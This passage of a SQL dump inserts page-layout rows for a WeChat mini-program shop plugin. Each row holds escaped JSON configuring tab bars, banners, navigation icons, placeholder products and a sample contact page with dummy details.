\\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"}]}],\"tabbar\":{\"name\":\"\\u5e95\\u90e8\\u83dc\\u5355\\u7ec4\",\"type\":\"tabBar\",\"style\":{\"color\":\"#666666\",\"selectedColor\":\"#e93b3d\",\"background\":\"#ffffff\"},\"adddata\":{\"pagePath\":\"\\/pages\\/index\\/index\",\"text\":\"\\u9996\\u9875\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/custom.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/custom-active.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"index_index\",\"value\":\"\",\"is_vars\":0}},\"data\":[{\"pagePath\":\"\\/pages\\/index\\/index\",\"text\":\"\\u9996\\u9875\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/home.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q059363L.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"index_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/category\\/index\",\"text\":\"\\u5206\\u7c7b\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/cate.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q05945328.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"category_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/flow\\/index\",\"text\":\"\\u8d2d\\u7269\\u8f66\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/flow.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q10215415.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"flow_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/user\\/index\",\"text\":\"\\u6211\\u7684\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/user.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q10223462.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"user_index\",\"value\":\"\",\"is_vars\":0}}],\"id\":4},\"diyStyle\":{\"titleModel\":{\"style\":4,\"text\":{\"source\":\"default\",\"default\":{\"size\":15,\"color\":\"#000000\"},\"custom\":{\"size\":15,\"color\":\"#000000\"}},\"linesbackground\":\"#00aeff\"},\"commonModel\":{\"background\":\"#f4f4f4\",\"navtitleTextColor\":\"black\",\"navtitleBackgroundColor\":\"#ffffff\"}}}', '3', '0', '1', '1', '0', 'cn', '1604452245', '1666062563');
INSERT INTO `ey_weapp_diyminipro_mall_page` VALUES ('17', '4', '商品详情页', '{\"page\":{\"type\":\"page\",\"name\":\"\\u9875\\u9762\\u8bbe\\u7f6e\",\"params\":{\"title\":\"\\u5546\\u54c1\\u8be6\\u60c5\\u9875\",\"share_title\":\"\\u5206\\u4eab\\u6807\\u9898\"}},\"items\":[{\"name\":\"\\u5546\\u54c1\\u8be6\\u60c5\\u9875\",\"type\":\"goodsDetails\",\"params\":{\"type\":\"phone\",\"phone_num\":\"\",\"recomNum\":6,\"recomShow\":1,\"titleArr\":[\"\\u4e0d\\u663e\\u793a\",\"\\u6700\\u65b0\",\"\\u63a8\\u8350\",\"\\u6700\\u70ed\"],\"recomTitle\":\"\\u53ef\\u80fd\\u4f60\\u8fd8\\u60f3\\u8981\"},\"style\":{\"show_type\":10,\"background\":\"#ffffff\"},\"defaultData\":[{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"}]}],\"tabbar\":{\"name\":\"\\u5e95\\u90e8\\u83dc\\u5355\\u7ec4\",\"type\":\"tabBar\",\"style\":{\"color\":\"#666666\",\"selectedColor\":\"#e93b3d\",\"background\":\"#ffffff\"},\"adddata\":{\"pagePath\":\"\\/pages\\/index\\/index\",\"text\":\"\\u9996\\u9875\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/custom.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/custom-active.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"index_index\",\"value\":\"\",\"is_vars\":0}},\"data\":[{\"pagePath\":\"\\/pages\\/index\\/index\",\"text\":\"\\u9996\\u9875\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/home.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q059363L.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"index_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/category\\/index\",\"text\":\"\\u5206\\u7c7b\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/cate.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q05945328.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"category_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/flow\\/index\",\"text\":\"\\u8d2d\\u7269\\u8f66\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/flow.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q10215415.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"flow_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/user\\/index\",\"text\":\"\\u6211\\u7684\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/user.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q10223462.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"user_index\",\"value\":\"\",\"is_vars\":0}}],\"id\":4},\"diyStyle\":{\"titleModel\":{\"style\":4,\"text\":{\"source\":\"default\",\"default\":{\"size\":15,\"color\":\"#000000\"},\"custom\":{\"size\":15,\"color\":\"#000000\"}},\"linesbackground\":\"#00aeff\"},\"commonModel\":{\"background\":\"#f4f4f4\",\"navtitleTextColor\":\"black\",\"navtitleBackgroundColor\":\"#ffffff\"}}}', '3', '0', '1', '1', '0', 'cn', '1604452245', '1666062563');
INSERT INTO `ey_weapp_diyminipro_mall_page` VALUES ('16', '3', '联系我们', '{\"page\":{\"type\":\"page\",\"name\":\"\\u9875\\u9762\\u8bbe\\u7f6e\",\"params\":{\"title\":\"\\u8054\\u7cfb\\u6211\\u4eec\",\"share_title\":\"\\u8054\\u7cfb\\u6211\\u4eec\"}},\"items\":[{\"name\":\"\\u8054\\u7cfb\\u6211\\u4eec\",\"type\":\"contact\",\"params\":{\"titleConf\":{\"text\":\"\\u6b64\\u5904\\u663e\\u793a\\u6807\\u9898\\u680f\\u540d\\u79f0\",\"showhide\":\"show\",\"url\":\"\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0}}},\"style\":{\"paddingTop\":\"10\",\"paddingLeft\":\"10\",\"background\":\"#ffffff\",\"borderBottomColor\":\"#eeeeee\"},\"data\":{\"logo\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/contact\\/logo.png\",\"banner\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/contact\\/banner.png\",\"web_name\":\"\\u67d0\\u67d0\\u7f51\\u7edc\\u79d1\\u6280\\u516c\\u53f8\",\"mobile\":\"13800000000\",\"weixin\":\"123456789\",\"qq\":\"10000\",\"email\":\"test@email.com\",\"address\":\"\\u6d77\\u5357\\u7701\\u6d77\\u53e3\\u5e02\",\"coordinate\":\"110.32552547126,20.044049439257\",\"nav_title\":\"\\u516c\\u53f8\\u7b80\\u4ecb\",\"content\":\"<p> \\u67d0\\u67d0\\u7f51\\u7edc\\u79d1\\u6280\\u6709\\u9650\\u516c\\u53f8\\u6210\\u7acb\\u4e8e2006\\u5e74\\uff0c\\u81f4\\u529b\\u884c\\u4e1a10\\u5e74\\uff0c\\u5f00\\u521b\\u667a\\u80fd\\u54cd\\u5e94\\u5f0f\\u5efa\\u7ad9\\u4e91\\u5e73\\u53f0\\uff0c\\u6253\\u9020\\u96c6\\u54cd\\u5e94\\u5f0f\\u7f51\\u7ad9\\u6280\\u672f\\u3001\\u4e91\\u7aef\\u67b6\\u6784\\u3001\\u6574\\u5408\\u8425\\u9500\\u4e3a\\u4e00\\u4f53\\u5546\\u4e1a\\u6a21\\u5f0f\\u3002\\u4f34\\u968f\\u7740\\u4e2d\\u56fd\\u4e92\\u8054\\u7f51\\u7684\\u6210\\u957f\\uff0c\\u7ecf\\u5386\\u4e86\\u4e92\\u8054\\u7f51\\u5feb\\u901f\\u53d1\\u5c55\\u768410\\u5e74\\uff0c\\u79ef\\u7d2f\\u4e86\\u96c4\\u539a\\u81ea\\u4e3b\\u7814\\u53d1\\u6280\\u672f\\u548c\\u4e30\\u5bcc\\u7684\\u54cd\\u5e94\\u5f0f\\u7f51\\u7ad9\\u5f00\\u53d1\\u6848\\u4f8b\\u3002<\\/p><p><br\\/><\\/p><p> \\u9762\\u5bf9\\u65e5\\u65b0\\u6708\\u5f02\\u7684\\u4e92\\u8054\\u7f51\\u8d8b\\u52bf\\uff0c2016\\u65d7\\u4e0b\\u201c\\u67d0\\u67d0\\u201c\\u54cd\\u5e94\\u5f0f\\u8425\\u9500\\u4e91\\u5e73\\u53f0\\uff0c\\u653b\\u514b\\u6280\\u672f\\u96be\\u9898\\uff0c\\u81ea\\u4e3b\\u6253\\u9020\\u4ee5SaaS\\u4e91\\u5e73\\u53f0\\u4e3a\\u6784\\u67b6\\uff0c\\u201c\\u5feb\\u901f\\u54cd\\u5e94\\u5f0f\\u5efa\\u7ad9+\\u5168\\u7ef4\\u5ea6\\u6574\\u5408\\u8425\\u9500\\u201d\\u4e3a\\u6838\\u5fc3\\uff0c\\u4ece\\u8fc7\\u53bb\\u5c40\\u9650\\u7684\\u5b9a\\u5236\\u5efa\\u7ad9\\u8fd0\\u8425\\u8f6c\\u53d8\\u4e3a\\u6574\\u5408\\u8425\\u9500\\u8fd0\\u8425\\uff0c\\u9886\\u5148\\u5b9e\\u73b0\\u667a\\u80fd\\u54cd\\u5e94\\u5f0f\\u6280\\u672f\\u548c\\u7f51\\u7ad9\\u53ef\\u89c6\\u5316\\u7f16\\u8f91\\u65b9\\u6848\\uff0c\\u4e0d\\u4ec5\\u63d0\\u4f9b\\u5168\\u8bbe\\u5907\\u667a\\u80fd\\u54cd\\u5e94\\u5f0f\\u7cfb\\u7edf\\u7684\\u529f\\u80fd\\uff0c\\u66f4\\u878d\\u5408\\u4e86\\u826f\\u597d\\u7684\\u7528\\u6237\\u4f53\\u9a8c\\u548c\\u591a\\u5c42\\u6b21\\u4f18\\u5316\\u6307\\u5bfc\\uff0c\\u6e17\\u900f\\u5230\\u4e92\\u8054\\u7f51+\\u7684\\u5168\\u7ef4\\u5ea6\\u6574\\u5408\\u8425\\u9500\\u8fd0\\u8425\\u7ba1\\u7406\\u4e2d\\uff0c\\u5176\\u521b\\u65b0\\u7684\\u5546\\u4e1a\\u6a21\\u5f0f\\u96c6\\u5408\\u4e86\\u4ea7\\u4e1a\\u94fe\\u7684\\u5173\\u952e\\u5143\\u7d20\\uff0c\\u771f\\u6b63\\u610f\\u4e49\\u4e0a\\u5177\\u5907\\u4e86\\u4f01\\u4e1a\\u53d1\\u5c55\\u9700\\u6c42\\u7684\\u6574\\u4f53\\u8425\\u9500\\uff0c\\u4e3a\\u4f01\\u4e1a\\u63d0\\u4f9b\\u591a\\u5143\\u3001\\u9ad8\\u6548\\u3001\\u6613\\u7528\\u7684\\u7f51\\u7ad9\\u7ba1\\u7406\\u65b9\\u5f0f\\uff0c\\u6ee1\\u8db3\\u4f01\\u4e1a\\u5404\\u4e2a\\u9636\\u6bb5\\u4e0d\\u540c\\u53d8\\u5316\\u7684\\u7cfb\\u7edf\\u5347\\u7ea7\\u3002<\\/p>\"}}],\"tabbar\":{\"name\":\"\\u5e95\\u90e8\\u83dc\\u5355\\u7ec4\",\"type\":\"tabBar\",\"style\":{\"color\":\"#666666\",\"selectedColor\":\"#e93b3d\",\"background\":\"#ffffff\"},\"adddata\":{\"pagePath\":\"\\/pages\\/index\\/index\",\"text\":\"\\u9996\\u9875\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/custom.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/custom-active.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"index_index\",\"value\":\"\",\"is_vars\":0}},\"data\":[{\"pagePath\":\"\\/pages\\/index\\/index\",\"text\":\"\\u9996\\u9875\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/home.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q059363L.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"index_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/category\\/index\",\"text\":\"\\u5206\\u7c7b\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/cate.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q05945328.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"category_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/flow\\/index\",\"text\":\"\\u8d2d\\u7269\\u8f66\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/flow.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q10215415.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"flow_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/user\\/index\",\"text\":\"\\u6211\\u7684\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/user.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q10223462.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"user_index\",\"value\":\"\",\"is_vars\":0}}],\"id\":4},\"diyStyle\":{\"titleModel\":{\"style\":4,\"text\":{\"source\":\"default\",\"default\":{\"size\":15,\"color\":\"#000000\"},\"custom\":{\"size\":15,\"color\":\"#000000\"}},\"linesbackground\":\"#00aeff\"},\"commonModel\":{\"background\":\"#f4f4f4\",\"navtitleTextColor\":\"black\",\"navtitleBackgroundColor\":\"#ffffff\"}}}', '3', '0', '1', '1', '0', 'cn', '1589423797', '1666062563');
INSERT INTO `ey_weapp_diyminipro_mall_page` VALUES ('15', '2', '分类频道', '{\"page\":{\"type\":\"page\",\"name\":\"\\u9875\\u9762\\u8bbe\\u7f6e\",\"params\":{\"title\":\"\\u5206\\u7c7b\\u9891\\u9053\",\"share_title\":\"\\u5206\\u7c7b\\u9891\\u9053\"}},\"items\":[{\"name\":\"\\u5206\\u7c7b\\u9891\\u9053\",\"type\":\"category\",\"params\":{\"show_type\":\"10\"},\"style\":[]}],\"tabbar\":{\"name\":\"\\u5e95\\u90e8\\u83dc\\u5355\\u7ec4\",\"type\":\"tabBar\",\"style\":{\"color\":\"#666666\",\"selectedColor\":\"#e93b3d\",\"background\":\"#ffffff\"},\"adddata\":{\"pagePath\":\"\\/pages\\/index\\/index\",\"text\":\"\\u9996\\u9875\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/custom.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/custom-active.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"index_index\",\"value\":\"\",\"is_vars\":0}},\"data\":[{\"pagePath\":\"\\/pages\\/index\\/index\",\"text\":\"\\u9996\\u9875\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/home.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q059363L.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"index_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/category\\/index\",\"text\":\"\\u5206\\u7c7b\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/cate.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q05945328.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"category_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/flow\\/index\",\"text\":\"\\u8d2d\\u7269\\u8f66\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/flow.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q10215415.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"flow_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/user\\/index\",\"text\":\"\\u6211\\u7684\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/user.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q10223462.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"user_index\",\"value\":\"\",\"is_vars\":0}}],\"id\":4},\"diyStyle\":{\"titleModel\":{\"style\":4,\"text\":{\"source\":\"default\",\"default\":{\"size\":15,\"color\":\"#000000\"},\"custom\":{\"size\":15,\"color\":\"#000000\"}},\"linesbackground\":\"#00aeff\"},\"commonModel\":{\"background\":\"#f4f4f4\",\"navtitleTextColor\":\"black\",\"navtitleBackgroundColor\":\"#ffffff\"}}}', '3', '0', '1', '1', '0', 'cn', '1589423797', '1666062563');
INSERT INTO `ey_weapp_diyminipro_mall_page` VALUES ('14', '1', '首页', '{\"page\":{\"type\":\"page\",\"name\":\"\\u9875\\u9762\\u8bbe\\u7f6e\",\"params\":{\"title\":\"\\u8d2d\\u7269\\u5546\\u57ce\",\"share_title\":\"\\u5206\\u4eab\\u6807\\u9898\"},\"id\":5},\"items\":[{\"name\":\"\\u56fe\\u7247\\u8f6e\\u64ad\",\"type\":\"banner\",\"style\":{\"btnColor\":\"#ffffff\",\"btnShape\":\"round\",\"imgHeights\":\"180\",\"show_type\":\"10\",\"imgHeightsType\":\"custom\"},\"params\":{\"interval\":\"2800\",\"titleConf\":{\"text\":\"\\u6b64\\u5904\\u663e\\u793a\\u6807\\u9898\\u680f\\u540d\\u79f0\",\"showhide\":\"hide\",\"url\":\"\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0}}},\"data\":[{\"litpic\":\"\\/uploads\\/allimg\\/20221016\\/1-221016091635D2.jpg\",\"url\":\"\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0}},{\"litpic\":\"\\/uploads\\/allimg\\/20221018\\/1-22101Q01052524.jpg\",\"url\":\"\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0}}]},{\"name\":\"\\u5bfc\\u822a\\u7ec4\",\"type\":\"navBar\",\"params\":{\"titleConf\":{\"text\":\"\\u6b64\\u5904\\u663e\\u793a\\u6807\\u9898\\u680f\\u540d\\u79f0\",\"showhide\":\"hide\",\"url\":\"\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0}}},\"style\":{\"background\":\"#ffffff\",\"rowsNum\":\"4\",\"show_type\":10},\"data\":[{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q00Q3102.png\",\"imgName\":\"icon-1.png\",\"url\":\"\",\"text\":\"\\u70ed\\u9500\\u4ea7\\u54c1\",\"color\":\"#666666\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0},\"backgroundImage\":\"\\/weapp\\/DiyminiproMall\\/template\\/diyminipro\\/img\\/diy\\/navbar\\/03.png\",\"intro\":\"\\u526f\\u6587\\u672c1\",\"introcolor\":\"#666666\",\"background\":\"#ffffff\",\"bordercolor\":\"#eeeeee\"},{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q00Q9B6.png\",\"imgName\":\"icon-2.jpg\",\"url\":\"\",\"text\":\"\\u4f18\\u60e0\\u5238\",\"color\":\"#666666\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0},\"backgroundImage\":\"\\/weapp\\/DiyminiproMall\\/template\\/diyminipro\\/img\\/diy\\/navbar\\/03.png\",\"intro\":\"\\u526f\\u6587\\u672c2\",\"introcolor\":\"#666666\",\"background\":\"#ffffff\",\"bordercolor\":\"#eeeeee\"},{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q00RL44.png\",\"imgName\":\"icon-3.jpg\",\"url\":\"\",\"text\":\"\\u9650\\u65f6\\u62a2\\u8d2d\",\"color\":\"#666666\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0},\"backgroundImage\":\"\\/weapp\\/DiyminiproMall\\/template\\/diyminipro\\/img\\/diy\\/navbar\\/03.png\",\"intro\":\"\\u526f\\u6587\\u672c3\",\"introcolor\":\"#666666\",\"background\":\"#ffffff\",\"bordercolor\":\"#eeeeee\"},{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q00S4364.png\",\"imgName\":\"icon-4.jpg\",\"url\":\"\",\"text\":\"\\u5355\\u54c1\\u79d2\\u6740\",\"color\":\"#666666\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0},\"backgroundImage\":\"\\/weapp\\/DiyminiproMall\\/template\\/diyminipro\\/img\\/diy\\/navbar\\/03.png\",\"intro\":\"\\u526f\\u6587\\u672c4\",\"introcolor\":\"#666666\",\"background\":\"#ffffff\",\"bordercolor\":\"#eeeeee\"},{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q00T1123.png\",\"imgName\":\"icon-1.png\",\"url\":\"\",\"text\":\"\\u670d\\u88c5\\u57ce\",\"color\":\"#666666\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0},\"backgroundImage\":\"\\/weapp\\/DiyminiproMall\\/template\\/diyminipro\\/img\\/diy\\/navbar\\/03.png\",\"intro\":\"\\u526f\\u6587\\u672c5\",\"introcolor\":\"#666666\",\"background\":\"#ffffff\",\"bordercolor\":\"#eeeeee\"},{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q00U2400.png\",\"imgName\":\"icon-1.png\",\"url\":\"\",\"text\":\"\\u7535\\u5668\\u57ce\",\"color\":\"#666666\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0},\"backgroundImage\":\"\\/weapp\\/DiyminiproMall\\/template\\/diyminipro\\/img\\/diy\\/navbar\\/03.png\",\"intro\":\"\\u526f\\u6587\\u672c6\",\"introcolor\":\"#666666\",\"background\":\"#ffffff\",\"bordercolor\":\"#eeeeee\"},{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q00Z12M.png\",\"imgName\":\"icon-1.png\",\"url\":\"\",\"text\":\"\\u6bcd\\u5a74\\u4e13\\u533a\",\"color\":\"#666666\",\"pathconf\":{\"index\":\"default\",\"value\":\"\",\"is_vars\":0},\"backgroundImage\":\"\\/weapp\\/DiyminiproMall\\/template\\/diyminipro\\/img\\/diy\\/navbar\\/03.png\",\"intro\":\"\\u526f\\u6587\\u672c7\",\"introcolor\":\"#666666\",\"background\":\"#ffffff\",\"bordercolor\":\"#eeeeee\"},{\"litpic\":\"https:\\/\\/service.eyysz.cn\\/u